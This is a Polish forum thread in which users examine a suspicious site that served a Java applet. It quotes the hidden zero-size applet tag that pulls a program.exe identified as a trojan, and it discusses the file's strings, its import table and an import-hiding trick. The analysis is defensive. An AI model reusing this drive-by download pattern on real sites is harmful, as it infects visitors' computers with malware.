Proszę o pomoc w określeniu bezpieczeństwa strony.

[morderuk]

Witam, mam problem, ponieważ mam pewne podejrzenia co do pewnej strony na którą po wejściu i zaakceptowaniu aplikacji Java której rzekomo wymagała do funkcjonowania ( zarowno w Operze jak i Mozilli) utraciłem ważne dane na komputerze w ten sam dzień. Nie jestem pewien czy to rzeczywiście przez tą strone, dlatego chciałbym prosić o pomoc ludzi którzy się znają, aby określili czy strona rzeczywiście jest niebezpieczna na podstawie źródła lub czegokolwiek.

Strona to : http://www.rapidpunkty.pl

UWAGA ! Strona może być niebezpieczna i proszę na nią wchodzić TYLKO jeżeli pewni jesteście swoich umiejętności (jednak bez akceptacji Javy wątpie czy stanowi jakieś zagrożenie)

Bardzo proszę o pomoc.

@EDIT
Doszukałem się takiej komendy w zrodle strony, i jako ze nie znam sie na Javie prosze o wytlumaczenie co ona po kolei robi i co definiuje, bo mysle ze w tym sęk :

<applet width=0 height=0 code="Program.class" archive="program.jar">
<param name="program" value="http://www.rapidpunkty.pl/program.exe">

Takze przeczytalem troche o exploicie na podstawie luk w Javie, wiec tym bardziej..

@EDIT2
Rzeczywiscie pobralem ww. plik program.exe ze strony i jest to plik zainfekowany, myślę ze temat moze byc zamkniety, chociaz chetnie chcialbym zobaczyc jakas dyskusje na ten temat.

 

[Legalnl]

tak, na stronie jest trojan Packed.Win32.Krap.ag zajmujący według kasperskiego 15 miejsce: http://e-biznes.pl/2010/01/najpopularniejsze-szkodliwe-programy-grudnia-2009/

Po zaakceptowaniu javy pobierany zostaje program.exe - trojan.

a Tobie kolego zalecam zainstalowanie antywirusa

//edit: jak widzisz program exe pobierany jest na kompa, juz na oko widać ze w kodzie jest coś nie tak, nie trzeba wgl się na tym znac

 

[morderuk]

No to jest to jak dla mnie bardzo szkodliwe, nigdy wczesniej nie slyszalem o czyms takim, wyglada na podstawy HTML i javy wykonanie takiego czegos, temat antyvirusa pozostawiam bez komentarza, aczkolwiek chcialbym zapytac czy jezeli plik bylby niewykrywalny to samo zaakceptowanie javy wywolalo by jakas reakcje ?? I czy dziala to tylko na niektore wersje javy ??

 

[Legalnl]

plik niewykrywalny.... hmmm w tych czasach wirusy są niewykrywalne max kilka dni na pewno nie byleś pierwszy,a antywirusa warto mieć. byle co ja np mam Kasperskiego za kilka zł na allegro można kupić. porządny antywirus zawsze coś wykryje jak nie z sygnatur to heurystyki itp,a chyba te kilka zł na rok można dac w celu bezpieczeństwa, pomysl

 

[morderuk]

Wiem wiem, wynika to chyba tylko z mojego lenistwa. A mam jeszcze takie pytanie techniczne. Poniewaz link do strony wyslal mi ktos przedstawiajacy sie pseudonimem mojego znajomego, tak wiec czy jest jakas opcja typu sprawdzenie samego pliku, gdzie wysyla logi, jak dziala ? I czy mozna sprawdzic jakie jest IP admina tej strony ?? Lub cokolwiek co moglo by mnie nakierowac ?? Jak mowie, gdybym sam z googli wszedl na ta strone olal byl to, ale sytuacja jest w moim przypadku nieco podejrzana i duzo by to pomoglo.

 

[Legalnl]

jasne, wszystko da się sprawdzić, ustaliś itp, jezeli coś utraciłeś na kompie mozesz takze zgłosic sprawe na policje jest to normalne wlamanie i jest za to nawet więzienie a wiadomo Ty na pewno nie byles pierwszy

 

[cyber_pl]

jest to kolejna produkcja w borland delphi:

cyber@win9x:~/Pobrane$ strings ./program.exe | grep "elph"
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Delphi\Locales
Delphi Picture
Delphi Component
Delphi%.8X
cyber@win9x:~/Pobrane$

nic z tego ciekawego nie wyciagniesz, szkoda czasu zreszta.

 

[morderuk]

Moge wiedzieć w jaki sposob przegladnales kod zrodlowy pliku ?

 

[cyber_pl]

Moge wiedzieć w jaki sposob przegladnales kod zrodlowy pliku ?

W żaden, wyszukałem jedynie ciągów znaków zdefiniowanych w programie, te które widzisz dodaje kompilator Delphi Borlanda, nic szczególnego.

 

[Legalnl]

cyber tak spytam bo widze po Tobie znasz się na rzeczy, otwierając program w hexedytorze mozna odszukać nazwy funkcji w winapi, są to funkcje ktore zostały użyte w programie czy jest to cały modół windows.h? wiesz moze?

 

[cyber_pl]

Sa to nazwy funkcji które zostały dodane do sekcji symbolów importowanych (.idata) czyli z których najprawdopodobniej program korzysta.

Od strony 14 masz więcej informacji:

http://docs.google.com/viewer?a=v&q...vywXg2&sig=AHIEtbR_LguadjyZHnFn6JBjxV7njGS-VA

 

[Legalnl]

hmmm wlasnie ciekawi mnie to bo widocznie ten wirus korzysta z urozmaiconego jadłospisu funkcji

 

[grzonu]

Pewnie kozysta z komponentow a one kozystaja z wielu funkcji.

 

[5.56]

@Legalnl:
Hexedytorem da radę,ale w ładniejszej postaci będzie w takich programach jak lordPE czy pe viewer(chodzi o "import table").
Wspomnę tylko,że w co bardziej profesjonalnych programach(asm,uhuhuh) może być pewien trik oparty na zasadzie,że każdy exe ma na starcie zaimportowaną kernel32.dll która ma takie funkcje jak loadlibrary() i GetProcAddress()...to po co właściwie imporotwać jakiekolwiek inne? (po resztę informacji odsyłam do googli)
@Temat(żeby nie było że offtop):
taa,pewnie wirus :/
zapuść formata,powinno pomuc

 

[White/]

Witam, jestem kolejną osobą która dała się na to nabrać. Dokladnie tak samo, link przyslała mi osoba która podawała sie za mojego znajomego. Mam nadzieję że za wszystko zapłacisz odpowiednią ceną hakerze

 

[Legalnl]

Witam, jestem kolejną osobą która dała się na to nabrać. Dokladnie tak samo, link przyslała mi osoba która podawała sie za mojego znajomego. Mam nadzieję że za wszystko zapłacisz odpowiednią ceną hakerze

Proszę Cię tylko nie Haker... Haker nie włamuje się na komputery nie wyrządza szkód innym http://pl.wikipedia.org/wiki/Haker_(slang_komputerowy)